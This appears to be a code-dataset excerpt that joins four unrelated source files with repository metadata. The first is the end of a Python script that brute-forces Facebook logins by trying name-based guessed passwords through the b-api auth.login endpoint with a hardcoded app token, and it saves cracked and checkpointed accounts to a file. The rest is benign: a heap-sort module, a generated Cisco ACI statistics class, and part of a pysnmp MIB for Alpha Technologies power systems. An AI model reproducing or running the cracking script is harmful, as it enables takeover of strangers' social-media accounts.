cek.close()
cekpoint.append(user+pass2)
else:
pass3 = b['first_name'] + '123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass3)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mSuccessful\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass3
oks.append(user+pass3)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCheckpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass3
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass3+"\n")
cek.close()
cekpoint.append(user+pass3)
else:
pass4 = 'Pakistan'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass4)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mSuccessful\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass4
oks.append(user+pass4)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCheckpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass4
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass4+"\n")
cek.close()
cekpoint.append(user+pass4)
else:
pass5 = b['first_name'] + '12'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass5)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mSuccessful\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass5
oks.append(user+pass5)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCheckpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass5
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass5+"\n")
cek.close()
cekpoint.append(user+pass5)
else:
pass6 = b['first_name'] + '1234'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass6)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mSuccessful\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass6
oks.append(user+pass6)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCheckpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass6
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass6+"\n")
cek.close()
cekpoint.append(user+pass6)
else:
a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)
b = json.loads(a.text)
pass7 = b['first_name'] + '1122'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass7)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mSuccessful\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass7
oks.append(user+pass7)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCheckpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass7
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass7+"\n")
cek.close()
cekpoint.append(user+pass7)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print 42*"\033[1;96m="
print '\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;92mProcess Has Been Completed Komail says Thank You♥️ \033[1;97m....'
print"\033[1;96m[+] \033[1;92mTotal OK/\x1b[1;93mCP \033[1;91m: \033[1;92m"+str(len(oks))+"\033[1;97m/\033[1;93m"+str(len(cekpoint))
print("\033[1;96m[+] \033[1;92mTHANKS FOR USING MY COMMANDS ! WE WILL BE RIGHT BACK \033[1;91m: \033[1;97mout/checkpoint.txt")
raw_input("\n\033[1;96m[\033[1;97mBack\033[1;96m]")
menu()
if __name__ == '__main__':
login()
| [
"noreply@github.com"
] | noreply@github.com |
8fb5e452de9da869a55ccca9cd00839bdadeeeab | 3bfa43cd86d1fb3780f594c181debc65708af2b8 | /algorithms/sort/heap_sort.py | 0f1953ff4b5ac7e3fd902dd4f15744131c3cc8bf | [] | no_license | ninjaboynaru/my-python-demo | 2fdb6e75c88e07519d91ee8b0e650fed4a2f9a1d | d679a06a72e6dc18aed95c7e79e25de87e9c18c2 | refs/heads/master | 2022-11-06T14:05:14.848259 | 2020-06-21T20:10:05 | 2020-06-21T20:10:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,610 | py |
"""
<https://docs.python.org/3/library/heapq.html>
<https://www.youtube.com/watch?v=AEAmgbls8TM&feature=youtu.be>
Steps:
1. Put every item in the list into a heap
2. Each step get the smallest item from the heap, put the smallest into
a new list
3. Repeat until the heap is empty
```python
from heapq import heappush, heappop
This is the simple version with python module
def heap_sort(lst):
h = []
for val in lst:
heappush(h, val)
return [heappop(h) for i in range(len(h))]
```
There is also inplace heap sort
Steps:
1. Heapification (Bottom-up heapify the array)
1. Sink nodes in reverse order, sink(k)
2. After sinking, guaranteed that tree rooted at position k is a heap
2. Delete the head of the heap, delete the last item from the heap, swap
the last item in the root, and sink(0)
Time complexity: O(N log(N))
Space complexity: O(1)
The definition of sink(k):
Steps:
1. If k-th item is larger than one of its child, swap it with its child.
the children of k-th item is the (2*k+1) and (2*k+2).
(if the item is larger than both of the children, swap with the smaller one)
2. Repeat this until the end of the heap array.
Example:
3, 0, 1, 7, 9, 2
Heapifiy:
9
7 2
3 0 1
Delete head of heap, and sink(0):
7
3 2
1 0
Delete head of heap, and sink(0):
3
1 2
0
Delete head of heap, and sink(0):
2
1 0
Delete head of heap, and sink(0):
1
0
Delete head of heap, and sink(0):
0
"""
def heap_sort(lst):
def sink(start, end):
""" MaxHeap sink.
If lst[start] is smaller than its children, sink down till the end.
"""
left = 2*start + 1
right = 2*start + 2
swap_pos = None
if left > end:
return
if right > end or lst[left] > lst[right]:
swap_pos = left
else:
swap_pos = right
if swap_pos:
temp = lst[start]
lst[start] = lst[swap_pos]
lst[swap_pos] = temp
sink(swap_pos, end)
# Bottom-up heapify the array
for k in range(len(lst)-1, -1, -1):
sink(k, len(lst)-1)
# print(lst)
# Delete the head of the heap, delete the last item from the heap, swap
# the last item in the root, and sink(0)
for end in range(len(lst) - 1, 0, -1):
first = lst[0]
lst[0] = lst[end]
lst[end] = first
sink(0, end-1)
# print(lst)
if __name__ == "__main__":
lst = [3, 0, 1, 7, 9, 2]
heap_sort(lst)
print(lst)
| [
"wangxin19930411@163.com"
] | wangxin19930411@163.com |
b2c6540ba4582aa077ad54bbf8c43422c96bc68e | 3c000380cbb7e8deb6abf9c6f3e29e8e89784830 | /venv/Lib/site-packages/cobra/modelimpl/comp/trnsmtderrpktshist1d.py | 132265e9aed2a406e03e9466df4b0697c29e891b | [] | no_license | bkhoward/aciDOM | 91b0406f00da7aac413a81c8db2129b4bfc5497b | f2674456ecb19cf7299ef0c5a0887560b8b315d0 | refs/heads/master | 2023-03-27T23:37:02.836904 | 2021-03-26T22:07:54 | 2021-03-26T22:07:54 | 351,855,399 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 19,008 | py | # coding=UTF-8
# **********************************************************************
# Copyright (c) 2013-2020 Cisco Systems, Inc. All rights reserved
# written by zen warriors, do not modify!
# **********************************************************************
from cobra.mit.meta import ClassMeta
from cobra.mit.meta import StatsClassMeta
from cobra.mit.meta import CounterMeta
from cobra.mit.meta import PropMeta
from cobra.mit.meta import Category
from cobra.mit.meta import SourceRelationMeta
from cobra.mit.meta import NamedSourceRelationMeta
from cobra.mit.meta import TargetRelationMeta
from cobra.mit.meta import DeploymentPathMeta, DeploymentCategory
from cobra.model.category import MoCategory, PropCategory, CounterCategory
from cobra.mit.mo import Mo
# ##################################################
class TrnsmtdErrPktsHist1d(Mo):
"""
A class that represents historical statistics for transmitted error packets in a 1 day sampling interval. This class updates every hour.
"""
meta = StatsClassMeta("cobra.model.comp.TrnsmtdErrPktsHist1d", "transmitted error packets")
counter = CounterMeta("error", CounterCategory.COUNTER, "packets", "transmitted error packets")
counter._propRefs[PropCategory.IMPLICIT_CUMULATIVE] = "errorCum"
counter._propRefs[PropCategory.IMPLICIT_PERIODIC] = "errorPer"
counter._propRefs[PropCategory.IMPLICIT_MIN] = "errorMin"
counter._propRefs[PropCategory.IMPLICIT_MAX] = "errorMax"
counter._propRefs[PropCategory.IMPLICIT_AVG] = "errorAvg"
counter._propRefs[PropCategory.IMPLICIT_SUSPECT] = "errorSpct"
counter._propRefs[PropCategory.IMPLICIT_THRESHOLDED] = "errorThr"
counter._propRefs[PropCategory.IMPLICIT_TREND] = "errorTr"
counter._propRefs[PropCategory.IMPLICIT_RATE] = "errorRate"
meta._counters.append(counter)
counter = CounterMeta("drop", CounterCategory.COUNTER, "packets", "transmitted dropped packets")
counter._propRefs[PropCategory.IMPLICIT_CUMULATIVE] = "dropCum"
counter._propRefs[PropCategory.IMPLICIT_PERIODIC] = "dropPer"
counter._propRefs[PropCategory.IMPLICIT_MIN] = "dropMin"
counter._propRefs[PropCategory.IMPLICIT_MAX] = "dropMax"
counter._propRefs[PropCategory.IMPLICIT_AVG] = "dropAvg"
counter._propRefs[PropCategory.IMPLICIT_SUSPECT] = "dropSpct"
counter._propRefs[PropCategory.IMPLICIT_THRESHOLDED] = "dropThr"
counter._propRefs[PropCategory.IMPLICIT_TREND] = "dropTr"
counter._propRefs[PropCategory.IMPLICIT_RATE] = "dropRate"
meta._counters.append(counter)
meta.moClassName = "compTrnsmtdErrPktsHist1d"
meta.rnFormat = "HDcompTrnsmtdErrPkts1d-%(index)s"
meta.category = MoCategory.STATS_HISTORY
meta.label = "historical transmitted error packets stats in 1 day"
meta.writeAccessMask = 0x1
meta.readAccessMask = 0x1
meta.isDomainable = False
meta.isReadOnly = True
meta.isConfigurable = False
meta.isDeletable = False
meta.isContextRoot = True
meta.parentClasses.add("cobra.model.comp.Hv")
meta.parentClasses.add("cobra.model.comp.HpNic")
meta.parentClasses.add("cobra.model.comp.VNic")
meta.parentClasses.add("cobra.model.comp.Vm")
meta.superClasses.add("cobra.model.stats.Item")
meta.superClasses.add("cobra.model.stats.Hist")
meta.superClasses.add("cobra.model.comp.TrnsmtdErrPktsHist")
meta.rnPrefixes = [
('HDcompTrnsmtdErrPkts1d-', True),
]
prop = PropMeta("str", "childAction", "childAction", 4, PropCategory.CHILD_ACTION)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("deleteAll", "deleteall", 16384)
prop._addConstant("deleteNonPresent", "deletenonpresent", 8192)
prop._addConstant("ignore", "ignore", 4096)
meta.props.add("childAction", prop)
prop = PropMeta("str", "cnt", "cnt", 16212, PropCategory.REGULAR)
prop.label = "Number of Collections During this Interval"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("cnt", prop)
prop = PropMeta("str", "dn", "dn", 1, PropCategory.DN)
prop.label = "None"
prop.isDn = True
prop.isImplicit = True
prop.isAdmin = True
prop.isCreateOnly = True
meta.props.add("dn", prop)
prop = PropMeta("str", "dropAvg", "dropAvg", 7749, PropCategory.IMPLICIT_AVG)
prop.label = "transmitted dropped packets average value"
prop.isOper = True
prop.isStats = True
meta.props.add("dropAvg", prop)
prop = PropMeta("str", "dropCum", "dropCum", 7745, PropCategory.IMPLICIT_CUMULATIVE)
prop.label = "transmitted dropped packets cumulative"
prop.isOper = True
prop.isStats = True
meta.props.add("dropCum", prop)
prop = PropMeta("str", "dropMax", "dropMax", 7748, PropCategory.IMPLICIT_MAX)
prop.label = "transmitted dropped packets maximum value"
prop.isOper = True
prop.isStats = True
meta.props.add("dropMax", prop)
prop = PropMeta("str", "dropMin", "dropMin", 7747, PropCategory.IMPLICIT_MIN)
prop.label = "transmitted dropped packets minimum value"
prop.isOper = True
prop.isStats = True
meta.props.add("dropMin", prop)
prop = PropMeta("str", "dropPer", "dropPer", 7746, PropCategory.IMPLICIT_PERIODIC)
prop.label = "transmitted dropped packets periodic"
prop.isOper = True
prop.isStats = True
meta.props.add("dropPer", prop)
prop = PropMeta("str", "dropRate", "dropRate", 7753, PropCategory.IMPLICIT_RATE)
prop.label = "transmitted dropped packets rate"
prop.isOper = True
prop.isStats = True
meta.props.add("dropRate", prop)
prop = PropMeta("str", "dropSpct", "dropSpct", 7750, PropCategory.IMPLICIT_SUSPECT)
prop.label = "transmitted dropped packets suspect count"
prop.isOper = True
prop.isStats = True
meta.props.add("dropSpct", prop)
prop = PropMeta("str", "dropThr", "dropThr", 7751, PropCategory.IMPLICIT_THRESHOLDED)
prop.label = "transmitted dropped packets thresholded flags"
prop.isOper = True
prop.isStats = True
prop.defaultValue = 0
prop.defaultValueStr = "unspecified"
prop._addConstant("avgCrit", "avg-severity-critical", 2199023255552)
prop._addConstant("avgHigh", "avg-crossed-high-threshold", 68719476736)
prop._addConstant("avgLow", "avg-crossed-low-threshold", 137438953472)
prop._addConstant("avgMajor", "avg-severity-major", 1099511627776)
prop._addConstant("avgMinor", "avg-severity-minor", 549755813888)
prop._addConstant("avgRecovering", "avg-recovering", 34359738368)
prop._addConstant("avgWarn", "avg-severity-warning", 274877906944)
prop._addConstant("cumulativeCrit", "cumulative-severity-critical", 8192)
prop._addConstant("cumulativeHigh", "cumulative-crossed-high-threshold", 256)
prop._addConstant("cumulativeLow", "cumulative-crossed-low-threshold", 512)
prop._addConstant("cumulativeMajor", "cumulative-severity-major", 4096)
prop._addConstant("cumulativeMinor", "cumulative-severity-minor", 2048)
prop._addConstant("cumulativeRecovering", "cumulative-recovering", 128)
prop._addConstant("cumulativeWarn", "cumulative-severity-warning", 1024)
prop._addConstant("lastReadingCrit", "lastreading-severity-critical", 64)
prop._addConstant("lastReadingHigh", "lastreading-crossed-high-threshold", 2)
prop._addConstant("lastReadingLow", "lastreading-crossed-low-threshold", 4)
prop._addConstant("lastReadingMajor", "lastreading-severity-major", 32)
prop._addConstant("lastReadingMinor", "lastreading-severity-minor", 16)
prop._addConstant("lastReadingRecovering", "lastreading-recovering", 1)
prop._addConstant("lastReadingWarn", "lastreading-severity-warning", 8)
prop._addConstant("maxCrit", "max-severity-critical", 17179869184)
prop._addConstant("maxHigh", "max-crossed-high-threshold", 536870912)
prop._addConstant("maxLow", "max-crossed-low-threshold", 1073741824)
prop._addConstant("maxMajor", "max-severity-major", 8589934592)
prop._addConstant("maxMinor", "max-severity-minor", 4294967296)
prop._addConstant("maxRecovering", "max-recovering", 268435456)
prop._addConstant("maxWarn", "max-severity-warning", 2147483648)
prop._addConstant("minCrit", "min-severity-critical", 134217728)
prop._addConstant("minHigh", "min-crossed-high-threshold", 4194304)
prop._addConstant("minLow", "min-crossed-low-threshold", 8388608)
prop._addConstant("minMajor", "min-severity-major", 67108864)
prop._addConstant("minMinor", "min-severity-minor", 33554432)
prop._addConstant("minRecovering", "min-recovering", 2097152)
prop._addConstant("minWarn", "min-severity-warning", 16777216)
prop._addConstant("periodicCrit", "periodic-severity-critical", 1048576)
prop._addConstant("periodicHigh", "periodic-crossed-high-threshold", 32768)
prop._addConstant("periodicLow", "periodic-crossed-low-threshold", 65536)
prop._addConstant("periodicMajor", "periodic-severity-major", 524288)
prop._addConstant("periodicMinor", "periodic-severity-minor", 262144)
prop._addConstant("periodicRecovering", "periodic-recovering", 16384)
prop._addConstant("periodicWarn", "periodic-severity-warning", 131072)
prop._addConstant("rateCrit", "rate-severity-critical", 36028797018963968)
prop._addConstant("rateHigh", "rate-crossed-high-threshold", 1125899906842624)
prop._addConstant("rateLow", "rate-crossed-low-threshold", 2251799813685248)
prop._addConstant("rateMajor", "rate-severity-major", 18014398509481984)
prop._addConstant("rateMinor", "rate-severity-minor", 9007199254740992)
prop._addConstant("rateRecovering", "rate-recovering", 562949953421312)
prop._addConstant("rateWarn", "rate-severity-warning", 4503599627370496)
prop._addConstant("trendCrit", "trend-severity-critical", 281474976710656)
prop._addConstant("trendHigh", "trend-crossed-high-threshold", 8796093022208)
prop._addConstant("trendLow", "trend-crossed-low-threshold", 17592186044416)
prop._addConstant("trendMajor", "trend-severity-major", 140737488355328)
prop._addConstant("trendMinor", "trend-severity-minor", 70368744177664)
prop._addConstant("trendRecovering", "trend-recovering", 4398046511104)
prop._addConstant("trendWarn", "trend-severity-warning", 35184372088832)
prop._addConstant("unspecified", None, 0)
meta.props.add("dropThr", prop)
prop = PropMeta("str", "dropTr", "dropTr", 7752, PropCategory.IMPLICIT_TREND)
prop.label = "transmitted dropped packets trend"
prop.isOper = True
prop.isStats = True
meta.props.add("dropTr", prop)
prop = PropMeta("str", "errorAvg", "errorAvg", 7770, PropCategory.IMPLICIT_AVG)
prop.label = "transmitted error packets average value"
prop.isOper = True
prop.isStats = True
meta.props.add("errorAvg", prop)
prop = PropMeta("str", "errorCum", "errorCum", 7766, PropCategory.IMPLICIT_CUMULATIVE)
prop.label = "transmitted error packets cumulative"
prop.isOper = True
prop.isStats = True
meta.props.add("errorCum", prop)
prop = PropMeta("str", "errorMax", "errorMax", 7769, PropCategory.IMPLICIT_MAX)
prop.label = "transmitted error packets maximum value"
prop.isOper = True
prop.isStats = True
meta.props.add("errorMax", prop)
prop = PropMeta("str", "errorMin", "errorMin", 7768, PropCategory.IMPLICIT_MIN)
prop.label = "transmitted error packets minimum value"
prop.isOper = True
prop.isStats = True
meta.props.add("errorMin", prop)
prop = PropMeta("str", "errorPer", "errorPer", 7767, PropCategory.IMPLICIT_PERIODIC)
prop.label = "transmitted error packets periodic"
prop.isOper = True
prop.isStats = True
meta.props.add("errorPer", prop)
prop = PropMeta("str", "errorRate", "errorRate", 7774, PropCategory.IMPLICIT_RATE)
prop.label = "transmitted error packets rate"
prop.isOper = True
prop.isStats = True
meta.props.add("errorRate", prop)
prop = PropMeta("str", "errorSpct", "errorSpct", 7771, PropCategory.IMPLICIT_SUSPECT)
prop.label = "transmitted error packets suspect count"
prop.isOper = True
prop.isStats = True
meta.props.add("errorSpct", prop)
prop = PropMeta("str", "errorThr", "errorThr", 7772, PropCategory.IMPLICIT_THRESHOLDED)
prop.label = "transmitted error packets thresholded flags"
prop.isOper = True
prop.isStats = True
prop.defaultValue = 0
prop.defaultValueStr = "unspecified"
prop._addConstant("avgCrit", "avg-severity-critical", 2199023255552)
prop._addConstant("avgHigh", "avg-crossed-high-threshold", 68719476736)
prop._addConstant("avgLow", "avg-crossed-low-threshold", 137438953472)
prop._addConstant("avgMajor", "avg-severity-major", 1099511627776)
prop._addConstant("avgMinor", "avg-severity-minor", 549755813888)
prop._addConstant("avgRecovering", "avg-recovering", 34359738368)
prop._addConstant("avgWarn", "avg-severity-warning", 274877906944)
prop._addConstant("cumulativeCrit", "cumulative-severity-critical", 8192)
prop._addConstant("cumulativeHigh", "cumulative-crossed-high-threshold", 256)
prop._addConstant("cumulativeLow", "cumulative-crossed-low-threshold", 512)
prop._addConstant("cumulativeMajor", "cumulative-severity-major", 4096)
prop._addConstant("cumulativeMinor", "cumulative-severity-minor", 2048)
prop._addConstant("cumulativeRecovering", "cumulative-recovering", 128)
prop._addConstant("cumulativeWarn", "cumulative-severity-warning", 1024)
prop._addConstant("lastReadingCrit", "lastreading-severity-critical", 64)
prop._addConstant("lastReadingHigh", "lastreading-crossed-high-threshold", 2)
prop._addConstant("lastReadingLow", "lastreading-crossed-low-threshold", 4)
prop._addConstant("lastReadingMajor", "lastreading-severity-major", 32)
prop._addConstant("lastReadingMinor", "lastreading-severity-minor", 16)
prop._addConstant("lastReadingRecovering", "lastreading-recovering", 1)
prop._addConstant("lastReadingWarn", "lastreading-severity-warning", 8)
prop._addConstant("maxCrit", "max-severity-critical", 17179869184)
prop._addConstant("maxHigh", "max-crossed-high-threshold", 536870912)
prop._addConstant("maxLow", "max-crossed-low-threshold", 1073741824)
prop._addConstant("maxMajor", "max-severity-major", 8589934592)
prop._addConstant("maxMinor", "max-severity-minor", 4294967296)
prop._addConstant("maxRecovering", "max-recovering", 268435456)
prop._addConstant("maxWarn", "max-severity-warning", 2147483648)
prop._addConstant("minCrit", "min-severity-critical", 134217728)
prop._addConstant("minHigh", "min-crossed-high-threshold", 4194304)
prop._addConstant("minLow", "min-crossed-low-threshold", 8388608)
prop._addConstant("minMajor", "min-severity-major", 67108864)
prop._addConstant("minMinor", "min-severity-minor", 33554432)
prop._addConstant("minRecovering", "min-recovering", 2097152)
prop._addConstant("minWarn", "min-severity-warning", 16777216)
prop._addConstant("periodicCrit", "periodic-severity-critical", 1048576)
prop._addConstant("periodicHigh", "periodic-crossed-high-threshold", 32768)
prop._addConstant("periodicLow", "periodic-crossed-low-threshold", 65536)
prop._addConstant("periodicMajor", "periodic-severity-major", 524288)
prop._addConstant("periodicMinor", "periodic-severity-minor", 262144)
prop._addConstant("periodicRecovering", "periodic-recovering", 16384)
prop._addConstant("periodicWarn", "periodic-severity-warning", 131072)
prop._addConstant("rateCrit", "rate-severity-critical", 36028797018963968)
prop._addConstant("rateHigh", "rate-crossed-high-threshold", 1125899906842624)
prop._addConstant("rateLow", "rate-crossed-low-threshold", 2251799813685248)
prop._addConstant("rateMajor", "rate-severity-major", 18014398509481984)
prop._addConstant("rateMinor", "rate-severity-minor", 9007199254740992)
prop._addConstant("rateRecovering", "rate-recovering", 562949953421312)
prop._addConstant("rateWarn", "rate-severity-warning", 4503599627370496)
prop._addConstant("trendCrit", "trend-severity-critical", 281474976710656)
prop._addConstant("trendHigh", "trend-crossed-high-threshold", 8796093022208)
prop._addConstant("trendLow", "trend-crossed-low-threshold", 17592186044416)
prop._addConstant("trendMajor", "trend-severity-major", 140737488355328)
prop._addConstant("trendMinor", "trend-severity-minor", 70368744177664)
prop._addConstant("trendRecovering", "trend-recovering", 4398046511104)
prop._addConstant("trendWarn", "trend-severity-warning", 35184372088832)
prop._addConstant("unspecified", None, 0)
meta.props.add("errorThr", prop)
prop = PropMeta("str", "errorTr", "errorTr", 7773, PropCategory.IMPLICIT_TREND)
prop.label = "transmitted error packets trend"
prop.isOper = True
prop.isStats = True
meta.props.add("errorTr", prop)
prop = PropMeta("str", "index", "index", 5957, PropCategory.REGULAR)
prop.label = "History Index"
prop.isConfig = True
prop.isAdmin = True
prop.isCreateOnly = True
prop.isNaming = True
meta.props.add("index", prop)
prop = PropMeta("str", "lastCollOffset", "lastCollOffset", 111, PropCategory.REGULAR)
prop.label = "Collection Length"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("lastCollOffset", prop)
prop = PropMeta("str", "modTs", "modTs", 7, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = 0
prop.defaultValueStr = "never"
prop._addConstant("never", "never", 0)
meta.props.add("modTs", prop)
prop = PropMeta("str", "repIntvEnd", "repIntvEnd", 110, PropCategory.REGULAR)
prop.label = "Reporting End Time"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("repIntvEnd", prop)
prop = PropMeta("str", "repIntvStart", "repIntvStart", 109, PropCategory.REGULAR)
prop.label = "Reporting Start Time"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("repIntvStart", prop)
prop = PropMeta("str", "rn", "rn", 2, PropCategory.RN)
prop.label = "None"
prop.isRn = True
prop.isImplicit = True
prop.isAdmin = True
prop.isCreateOnly = True
meta.props.add("rn", prop)
prop = PropMeta("str", "status", "status", 3, PropCategory.STATUS)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("created", "created", 2)
prop._addConstant("deleted", "deleted", 8)
prop._addConstant("modified", "modified", 4)
meta.props.add("status", prop)
meta.namingProps.append(getattr(meta.props, "index"))
def __init__(self, parentMoOrDn, index, markDirty=True, **creationProps):
namingVals = [index]
Mo.__init__(self, parentMoOrDn, markDirty, *namingVals, **creationProps)
# End of package file
# ##################################################
| [
"bkhoward@live.com"
] | bkhoward@live.com |
5a8b3968a4cc55cdc7a8bc045270be33a8d29f1b | 85a9ffeccb64f6159adbd164ff98edf4ac315e33 | /pysnmp-with-texts/AlphaPowerSystem-MIB.py | c83f2dc059508d3a6ad59c5621b516f5335d4221 | [
"Apache-2.0",
"LicenseRef-scancode-warranty-disclaimer",
"LicenseRef-scancode-proprietary-license",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | agustinhenze/mibs.snmplabs.com | 5d7d5d4da84424c5f5a1ed2752f5043ae00019fb | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | refs/heads/master | 2020-12-26T12:41:41.132395 | 2019-08-16T15:51:41 | 2019-08-16T15:53:57 | 237,512,469 | 0 | 0 | Apache-2.0 | 2020-01-31T20:41:36 | 2020-01-31T20:41:35 | null | UTF-8 | Python | false | false | 87,886 | py | #
# PySNMP MIB module AlphaPowerSystem-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/AlphaPowerSystem-MIB
# Produced by pysmi-0.3.4 at Wed May 1 11:33:13 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
OctetString, ObjectIdentifier, Integer = mibBuilder.importSymbols("ASN1", "OctetString", "ObjectIdentifier", "Integer")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ConstraintsIntersection, SingleValueConstraint, ValueRangeConstraint, ConstraintsUnion, ValueSizeConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "ConstraintsIntersection", "SingleValueConstraint", "ValueRangeConstraint", "ConstraintsUnion", "ValueSizeConstraint")
NotificationGroup, ModuleCompliance = mibBuilder.importSymbols("SNMPv2-CONF", "NotificationGroup", "ModuleCompliance")
Bits, MibIdentifier, NotificationType, MibScalar, MibTable, MibTableRow, MibTableColumn, Gauge32, ObjectIdentity, Unsigned32, enterprises, ModuleIdentity, Counter32, Counter64, IpAddress, TimeTicks, Integer32, iso = mibBuilder.importSymbols("SNMPv2-SMI", "Bits", "MibIdentifier", "NotificationType", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "Gauge32", "ObjectIdentity", "Unsigned32", "enterprises", "ModuleIdentity", "Counter32", "Counter64", "IpAddress", "TimeTicks", "Integer32", "iso")
TextualConvention, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "TextualConvention", "DisplayString")
alpha = ModuleIdentity((1, 3, 6, 1, 4, 1, 7309))
if mibBuilder.loadTexts: alpha.setLastUpdated('201102220000Z')
if mibBuilder.loadTexts: alpha.setOrganization('Alpha Technologies')
if mibBuilder.loadTexts: alpha.setContactInfo('Alpha Technologies 7700 Riverfront Gate Burnaby, BC V5J 5M4 Canada Tel: 1-604-436-5900 Fax: 1-604-436-1233')
if mibBuilder.loadTexts: alpha.setDescription('This MIB defines the information block(s) available in system controllers as defined by the following list: - dcPwrSysDevice: Cordex series of Controllers')
dcpower = MibIdentifier((1, 3, 6, 1, 4, 1, 7309, 4))
dcPwrSysDevice = MibIdentifier((1, 3, 6, 1, 4, 1, 7309, 4, 1))
dcPwrSysVariable = MibIdentifier((1, 3, 6, 1, 4, 1, 7309, 4, 1, 1))
dcPwrSysString = MibIdentifier((1, 3, 6, 1, 4, 1, 7309, 4, 1, 2))
dcPwrSysTraps = MibIdentifier((1, 3, 6, 1, 4, 1, 7309, 4, 1, 3))
dcPwrSysOutputsTbl = MibIdentifier((1, 3, 6, 1, 4, 1, 7309, 4, 1, 4))
dcPwrSysRelayTbl = MibIdentifier((1, 3, 6, 1, 4, 1, 7309, 4, 1, 4, 1))
dcPwrSysAnalogOpTbl = MibIdentifier((1, 3, 6, 1, 4, 1, 7309, 4, 1, 4, 2))
dcPwrSysAlrmsTbl = MibIdentifier((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5))
dcPwrSysRectAlrmTbl = MibIdentifier((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 1))
dcPwrSysDigAlrmTbl = MibIdentifier((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 2))
dcPwrSysCurrAlrmTbl = MibIdentifier((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 3))
dcPwrSysVoltAlrmTbl = MibIdentifier((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 4))
dcPwrSysBattAlrmTbl = MibIdentifier((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 5))
dcPwrSysTempAlrmTbl = MibIdentifier((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 6))
